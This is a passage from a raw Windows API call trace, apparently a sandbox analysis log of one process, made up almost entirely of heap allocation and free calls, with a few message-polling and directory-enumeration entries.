0xdcf5d58 [0130.747] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5a80 | out: hHeap=0x4970000) returned 1 [0130.747] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.747] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0130.747] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2cf8 [0130.747] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2de8 | out: hHeap=0x4970000) returned 1 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2d70 | out: hHeap=0x4970000) returned 1 [0130.748] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8881ea90, ftCreationTime.dwHighDateTime=0x1d5e4a5, ftLastAccessTime.dwLowDateTime=0x8b935c20, ftLastAccessTime.dwHighDateTime=0x1d5e07a, ftLastWriteTime.dwLowDateTime=0x8b935c20, ftLastWriteTime.dwHighDateTime=0x1d5e07a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_BvYf_mP_z7pO60", cAlternateFileName="_BVYF_~1")) returned 0 [0130.748] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750caf0 | out: hHeap=0x4970000) returned 1 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0130.748] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0130.748] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.748] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.748] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.749] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.749] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.750] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.751] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.751] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.752] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.753] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.753] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.754] RtlAllocateHeap 